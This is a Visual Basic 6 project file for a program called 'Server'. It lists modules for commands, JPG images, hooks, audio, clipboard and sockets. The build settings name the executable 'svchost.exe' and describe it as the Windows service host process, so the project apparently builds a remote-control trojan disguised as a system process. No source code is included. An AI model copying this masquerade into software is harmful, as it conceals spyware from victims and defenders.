Type=Exe
Form=Server.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#E:\game\PRINCE~1\Support\Register\register\dll\Stdole2.tlb#OLE Automation
Module=Cmd; Cmd.bas
Module=JPG; JPG.bas
Module=Hook; Hook.bas
Module=Wave; Wave.bas
Module=Mixer; Mixer.bas
Module=MClipboard; MClipboard.bas
Module=modSocketPlus; modSocketPlus.bas
Class=CSocketPlus; CSocketPlus.cls
IconForm="Server"
Startup="Server"
HelpFile=""
Title="svchost.exe"
ExeName32="svchost.exe"
Command32=""
Name="svchost"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionFileDescription="Windows 服务主进程"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
